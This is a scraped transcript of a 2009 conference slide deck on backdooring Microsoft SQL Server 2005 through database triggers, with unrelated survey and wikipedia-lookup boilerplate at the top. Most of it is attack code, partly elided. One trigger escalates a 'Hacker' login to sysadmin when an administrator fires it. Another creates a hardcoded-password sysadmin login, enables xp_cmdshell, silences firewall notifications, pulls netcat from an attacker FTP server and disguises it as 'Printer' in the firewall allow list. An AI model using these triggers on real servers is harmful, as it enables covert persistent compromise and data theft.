Survey
* Your assessment is very important for improving the workof artificial intelligence, which forms the content of this project
* Your assessment is very important for improving the workof artificial intelligence, which forms the content of this project
Microsoft Access wikipedia , lookup
Open Database Connectivity wikipedia , lookup
Database model wikipedia , lookup
Relational model wikipedia , lookup
Ingres (database) wikipedia , lookup
Microsoft Jet Database Engine wikipedia , lookup
Clusterpoint wikipedia , lookup
MSSQL SERVER 2005 BACKDOOR Duong Ngo October 14, 2009 POST-EXPLOITATION Got access to a MSSQL box? (SQL injection, brute force…) Privileges: sa / dbo / normal user Got all data Now what’s next?? Backdoors Provide easier access to the compromised box in the future Type of backdoors: OS backdoors (rootkits), Web server backdoor ( PHPshell, CGITelnet..) So how’s about Database Backdoor?? YES! SQL Server 2005 Backdoor We’ll create a backdoor based on SQLServer Trigger. What’s Trigger? Database Trigger Special kind of stored procedure that executes automatically when a user attempts the specified data-modification statement on the specified table (UPDATE, DELETE, INSERT..) Trigger gets executed under the security context of who caused trigger to fire! EXAMPLE – Create trigger Context: Normal User with Create Trigger permission: CREATE TRIGGER trg_gain_ privilege ON tblCustomers FOR INSERT, DELETE,UPDATE AS EXEC sp_addsrvrolemember @loginame ='Hacker', @rolename = N'sysadmin‘ EXAMPLE – Trigger got fired Context: sa (server admin) sa> DELETE * FROM tblCustomers RESULT?? User: “Hacker” now become sysadmin What can we do with that? Privilege escalation: normal user -> higher role Database backdoor SQLServer Backdoor features: - Execute subsequent commands if current user is 'sa‘ - Enable xp_cmdshell - Create new login 'backdoor' and add it to sysadmin server role. - Disable firewall notification mode - Add ftp to allowed programs list - Get netcat from attacker ftp server - Create a directory 'Backdoor_activated' in attacker ftp server to let attacker knows whenever the backdoor has been started. - Open netcat in listen mode attached with sql command line client Osql. Our Backdoor’s Code CREATE TRIGGER trg_backdoor ON DATABASE FOR DDL_DATABASE_LEVEL_EVENTS AS BEGIN DECLARE @cur_user varchar(200) …… CREATE LOGIN [backdoor] WITH PASSWORD = 'Backdoor123#' ; EXEC sys.sp_addsrvrolemember @loginame = N'Backdoor', @rolename =N'sysadmin' --disable firewall notification mode Exec master..xp_cmdshell 'netsh firewall set notifications disable‘ ….. Why DL_DATABASE_LEVEL_EVENTS Because it consists of all below events: CREATE_TABLE ALTER_TABLE DROP_TABLE CREATE_VIEW ALTER_VIEW DROP_VIEW CREATE_SYNONYM DROP_SYNONYM CREATE_FUNCTION ALTER_FUNCTION DROP_FUNCTION CREATE_PROCEDURE ALTER_PROCEDURE DROP_PROCEDURE CREATE_TRIGGER ALTER_TRIGGER DROP_TRIGGER CREATE_EVENT_NOTIFICATION DROP_EVENT_NOTIFICATION …. …. Our Backdoor’s Code (cont) -- save ftp commands to an external file SET @cmd = 'echo GET ' + @fileget + ' >> ' + @cmdfile ….. -- execute ftp with commands loaded from the file we created SET @cmd = 'ftp -s:' + @cmdfile EXEC master..xp_cmdshell @cmd, NO_OUTPUT …… -- After get netcat, add netcat to firewall’s allowedprogram list SET @cmd = 'netsh firewall add allowedprogram program=' + @localdir + '\'+ @fileget + ' name=Printer mode=ENABLE scope=ALL profile=ALL' Thank You for listening!!